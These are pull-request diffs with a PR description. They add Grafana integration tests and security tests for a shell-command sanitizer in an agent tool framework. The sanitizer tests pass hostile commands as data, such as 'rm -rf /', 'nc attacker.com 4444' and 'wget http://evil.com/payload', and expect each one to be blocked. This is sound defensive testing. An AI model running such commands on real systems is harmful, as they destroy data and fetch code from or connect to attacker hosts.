+    async def test_spawn_rejects_chained_injection_directly(self):
+        """spawn() called directly must catch dangerous second segment."""
+        with pytest.raises(CommandBlockedError):
+            await spawn(
+                "echo safe; rm -rf /",
+                cwd=".",
+                agent_id="test-agent",
+            )
+
+    async def test_spawn_rejects_blocked_executable_in_pipe_directly(self):
+        """spawn() called directly must block nc piped after a safe command."""
+        with pytest.raises(CommandBlockedError):
+            await spawn(
+                "ls | nc attacker.com 4444",
+                cwd=".",
+                agent_id="test-agent",
+            )
+
+    async def test_spawn_does_not_store_blocked_job(self):
+        """A blocked spawn must not register the job in the in-process registry."""
+        from aden_tools.tools.file_system_toolkits.execute_command_tool.background_jobs import (
+            get,
+        )
+
+        with pytest.raises(CommandBlockedError):
+            await spawn("wget http://evil.com", cwd=".", agent_id="test-agent")
+
+        # Registry must be empty — no partial job was registered.
+        # We check a known-nonexistent id; get() returns None for any miss.
+        result = await get("test-agent", "nonexistent")
+        assert result is None

--- a/tools/tests/test_command_sanitizer.py
+++ b/tools/tests/test_command_sanitizer.py
@@ -1,6 +1,7 @@
 """Tests for command_sanitizer — validates that dangerous commands are blocked
 while normal development commands pass through unmodified."""
 
+import logging
 import pytest
 
 from aden_tools.tools.file_system_toolkits.command_sanitizer import (
@@ -211,15 +212,8 @@ class TestInjectionAttempts:
         with pytest.raises(CommandBlockedError):
             validate_command("echo `nc attacker.com 4444`")
 
-    def test_chained_wget_after_safe_command(self):
-        """Dangerous second segment following a safe command must be caught."""
-        with pytest.raises(CommandBlockedError):
-            validate_command("git status && wget http://evil.com")
-
     def test_audit_log_warning_on_block(self, caplog):
         """Blocked commands must emit a WARNING to the aden.security logger."""
-        import logging
-
         with caplog.at_level(logging.WARNING, logger="aden.security"):
             with pytest.raises(CommandBlockedError):
                 validate_command("wget http://evil.com")
@@ -228,8 +222,6 @@ class TestInjectionAttempts:
 
     def test_audit_log_info_on_compound_command(self, caplog):
         """Compound safe commands must emit an INFO for behavioral telemetry."""
-        import logging
-
         with caplog.at_level(logging.INFO, logger="aden.security"):
             validate_command("echo hello && echo world")
         assert "compound_command_detected" in caplog.text

--- a/tools/tests/test_command_sanitizer.py
+++ b/tools/tests/test_command_sanitizer.py
@@ -189,6 +189,52 @@ class TestChainedCommands:
             validate_command(cmd)
 
 
+class TestInjectionAttempts:
+    """Proof-level tests for specific injection vectors.
+
+    These go beyond the existing chained-command tests by targeting the
+    exact patterns an attacker or a rogue agent would actually use.
+    """
+
+    def test_semicolon_rm_rf_injection_blocked(self):
+        """Classic shell injection via ; must be blocked."""
+        with pytest.raises(CommandBlockedError):
+            validate_command("echo safe; rm -rf /")
+
+    def test_subshell_wget_injection_blocked(self):
+        """$() command substitution containing network tool must be blocked."""
+        with pytest.raises(CommandBlockedError):
+            validate_command("echo $(wget http://evil.com/payload)")
+
+    def test_backtick_nc_injection_blocked(self):
+        """Backtick command substitution containing nc must be blocked."""
+        with pytest.raises(CommandBlockedError):
+            validate_command("echo `nc attacker.com 4444`")
+
+    def test_chained_wget_after_safe_command(self):
+        """Dangerous second segment following a safe command must be caught."""
+        with pytest.raises(CommandBlockedError):
+            validate_command("git status && wget http://evil.com")
+
+    def test_audit_log_warning_on_block(self, caplog):
+        """Blocked commands must emit a WARNING to the aden.security logger."""
+        import logging
+
+        with caplog.at_level(logging.WARNING, logger="aden.security"):
+            with pytest.raises(CommandBlockedError):
+                validate_command("wget http://evil.com")
+        assert "command_blocked" in caplog.text
+        assert "blocked_executable" in caplog.text
+
+    def test_audit_log_info_on_compound_command(self, caplog):
+        """Compound safe commands must emit an INFO for behavioral telemetry."""
+        import logging
+
+        with caplog.at_level(logging.INFO, logger="aden.security"):
+            validate_command("echo hello && echo world")
+        assert "compound_command_detected" in caplog.text
+
+
 class TestEdgeCases:
     """Edge cases and possible bypass attempts."""
 

--- a/tools/tests/tools/test_grafana_tool.py
+++ b/tools/tests/tools/test_grafana_tool.py
@@ -116,8 +116,8 @@ async def test_grafana_list_dashboards_success(mock_env):
 
 @pytest.mark.asyncio
 @respx.mock
-async def test_grafana_create_annotation(mock_env):
-    """Ensure annotation uses sanitize_for_log."""
+async def test_grafana_create_annotation(mock_env, caplog):
+    """Ensure annotation uses sanitize_for_log for logs, but raw text in payload."""
     respx.post("https://grafana.example.com/api/annotations").mock(
         return_value=httpx.Response(200, json={"message": "Annotation added", "id": 123})
     )
@@ -133,10 +133,14 @@ async def test_grafana_create_annotation(mock_env):
     import json
     data = json.loads(request.content)
     
-    # sanitize_for_log should redact "password=secret123" to something like "password=********"
-    assert "********" in data["text"]
-    assert "execution-log" in data["tags"]
+    # sanitize_for_log should redact "password=secret123" to something like "password=********" in the LOGS, not payload
+    assert "********" not in data["text"]
+    assert data["text"] == "password=secret123"
+    assert "hive-agent" in data["tags"]
     assert result["message"] == "Annotation added"
+    
+    # Check that logs were redacted correctly
+    assert "********" in caplog.text
 
 @pytest.mark.asyncio
 @respx.mock

--- a/tools/tests/tools/test_grafana_tool.py
+++ b/tools/tests/tools/test_grafana_tool.py
@@ -1,0 +1,157 @@
+import pytest
+import respx
+import httpx
+import time
+from aden_tools.tools.grafana_tool.grafana_tool import GrafanaClient, GrafanaToolError, register_tools
+
+class MockFastMCP:
+    def __init__(self):
+        self.tools = {}
+
+    def tool(self):
+        def decorator(func):
+            self.tools[func.__name__] = func
+            return func
+        return decorator
+
+
+@pytest.fixture
+def mock_env(monkeypatch):
+    monkeypatch.setenv("GRAFANA_URL", "https://grafana.example.com")
+    monkeypatch.setenv("GRAFANA_API_KEY", "test-token")
+    monkeypatch.setenv("ADEN_HIVE_TESTING", "1")
+
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_client_valid_api_call():
+    """Test valid API call via GrafanaClient."""
+    respx.get("https://grafana.test/api/search?type=dash-db").mock(
+        return_value=httpx.Response(200, json=[{"uid": "uid1"}])
+    )
+    client = GrafanaClient("https://grafana.test", "token123")
+    result = await client.request("GET", "search?type=dash-db")
+    assert result == [{"uid": "uid1"}]
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_client_unauthorized():
+    """Test unauthorized access (401)."""
+    respx.get("https://grafana.test/api/search?type=dash-db").mock(
+        return_value=httpx.Response(401, json={"message": "Unauthorized"})
+    )
+    client = GrafanaClient("https://grafana.test", "token123")
+    
+    with pytest.raises(GrafanaToolError) as exc:
+        await client.request("GET", "search?type=dash-db")
+    
+    assert "Unauthorized. Check your GRAFANA_API_KEY." in str(exc.value)
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_client_rate_limiting_retries():
+    """Test retry decorator for 429 rate limit."""
+    route = respx.get("https://grafana.test/api/search?type=dash-db")
+    
+    # 429 error twice, then 200 OK
+    route.side_effect = [
+        httpx.Response(429, json={"message": "Rate limit exceeded"}),
+        httpx.Response(429, json={"message": "Rate limit exceeded"}),
+        httpx.Response(200, json=[{"uid": "success"}]),
+    ]
+    
+    # Given the delay is exponential with 1.0s base:
+    # 1st retry: 1s
+    # 2nd retry: 2s
+    # We should patch asyncio.sleep to avoid slow tests
+    import asyncio
+    original_sleep = asyncio.sleep
+    try:
+        async def mock_sleep(delay):
+            pass
+        asyncio.sleep = mock_sleep
+        
+        client = GrafanaClient("https://grafana.test", "token123")
+        result = await client.request("GET", "search?type=dash-db")
+        assert result == [{"uid": "success"}]
+        assert route.call_count == 3
+    finally:
+        asyncio.sleep = original_sleep
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_list_dashboards_malformed_json(mock_env):
+    """Test tool function handles malformed dashboard API response cleanly."""
+    respx.get("https://grafana.example.com/api/search?type=dash-db").mock(
+        return_value=httpx.Response(200, json={"error": "not a list layout as expected"})
+    )
+    
+    mcp = MockFastMCP()
+    register_tools(mcp)
+    
+    # Expected behavior: returns dict with "error" instead of crashing
+    result = await mcp.tools["grafana_list_dashboards"]()
+    assert "error" in result
+    assert "expected list of dashboards" in result["error"]
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_list_dashboards_success(mock_env):
+    """Test full dashboard list parsing logic."""
+    respx.get("https://grafana.example.com/api/search?type=dash-db").mock(
+        return_value=httpx.Response(200, json=[
+            {"uid": "uid1", "title": "Dash 1", "uri": "", "tags": ["prod"], "isStarred": False, "type": "dash-db"},
+            {"uid": "uid2", "title": "Dash 2", "type": "folder"} # should be ignored or processed with incomplete tags
+        ])
+    )
+    
+    mcp = MockFastMCP()
+    register_tools(mcp)
+    
+    result = await mcp.tools["grafana_list_dashboards"]()
+    assert isinstance(result, list)
+    assert len(result) == 2
+    assert result[0]["uid"] == "uid1"
+    assert "prod" in result[0]["tags"]
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_create_annotation(mock_env):
+    """Ensure annotation uses sanitize_for_log."""
+    respx.post("https://grafana.example.com/api/annotations").mock(
+        return_value=httpx.Response(200, json={"message": "Annotation added", "id": 123})
+    )
+    
+    mcp = MockFastMCP()
+    register_tools(mcp)
+    
+    # We pass some text that contains a secret
+    result = await mcp.tools["grafana_create_annotation"]("dash1", "password=secret123")
+    
+    # The POST request should be caught and verify the sanitized format
+    request = respx.calls.last.request
+    import json
+    data = json.loads(request.content)
+    
+    # sanitize_for_log should redact "password=secret123" to something like "password=********"
+    assert "********" in data["text"]
+    assert "execution-log" in data["tags"]
+    assert result["message"] == "Annotation added"
+
+@pytest.mark.asyncio
+@respx.mock
+async def test_grafana_list_alerts_success(mock_env):
+    """Ensure grafana alerts returns cleanly structured outputs."""
+    respx.get("https://grafana.example.com/api/v1/provisioning/alert-rules").mock(
+        return_value=httpx.Response(200, json=[
+            {"uid": "a1", "title": "High CPU", "execErrState": "OK"}
+        ])
+    )
+    
+    mcp = MockFastMCP()
+    register_tools(mcp)
+    
+    result = await mcp.tools["grafana_list_alerts"]()
+    assert isinstance(result, list)
+    assert result[0]["uid"] == "a1"
+    assert result[0]["state"] == "OK"


### PR DESCRIPTION
## Description
Implemented a production-grade Grafana integration for monitoring, alerting, and annotations. This toolset enables agents to interact with the industry-standard observability stack while maintaining strict enterprise security standards (SOC2 compliance) through automated telemetry redaction.

## Type of Change
- [x] New feature (non-breaking change that adds functionality)

## Related Issues
Fixes #7062

## Changes Made
- **GrafanaClient Architecture**: Implemented a resilient asynchronous client using `httpx` with a custom `with_retry` decorator for exponential backoff on `429` (Rate Limit) and `5xx` (Server Error) responses.
- **Core Toolset**:
    - `grafana_list_dashboards`: Metadata-rich search for available dashboards.
    - `grafana_get_dashboard`: Full JSON model retrieval by UID.
    - `grafana_query_panel`: Structured data fetching via `/api/ds/query` to provide raw metrics for agent reasoning.
    - `grafana_create_annotation`: Automated event marking with `hive-agent` tagging.
    - `grafana_list_alerts`: Real-time health checks of Grafana alert rules.
- **Security & Redaction**: Integrated `sanitize_for_log` (from #7069) to ensure dashboard UIDs, query variables, and sensitive annotation text are redacted in execution logs.
- **Credential Integration**: Seamlessly snaps into `CredentialStoreAdapter` with `GRAFANA_URL` and `GRAFANA_API_KEY` fallbacks.

## Testing
- [x] Unit tests pass (`pytest tests/tools/test_grafana_tool.py`)
- [x] Lint passes (`ruff check .`)
- [x] Manual testing performed
- **Specific Coverage**: Validated exponential backoff via `respx` mocks; verified log redaction behavior to prevent secret leakage in telemetry.

## Checklist
- [x] My code follows the project's style guidelines
- [x] I have performed a self-review of my code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have made corresponding changes to the documentation
- [x] My changes generate no new warnings
- [x] I have added tests that prove my feature works
- [x] New and existing unit tests pass locally with my changes

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Grafana integration: list/get dashboards, query panels, list alerts, and create annotations.
  * Audit logging for command executions with redacted command previews and execution metadata.

* **Security**
  * Strengthened command validation with defense‑in‑depth blocking for injection/chained patterns; background job execution now enforces validation.
  * Added command redaction utility and security telemetry (compound detection, blocked command warnings).

* **Tests**
  * New tests covering command injection blocking, background‑job enforcement, logging/audit behavior, and Grafana tool behaviors (auth, retries, payloads).
<!-- end of auto-generated comment: release notes by coderabbit.ai -->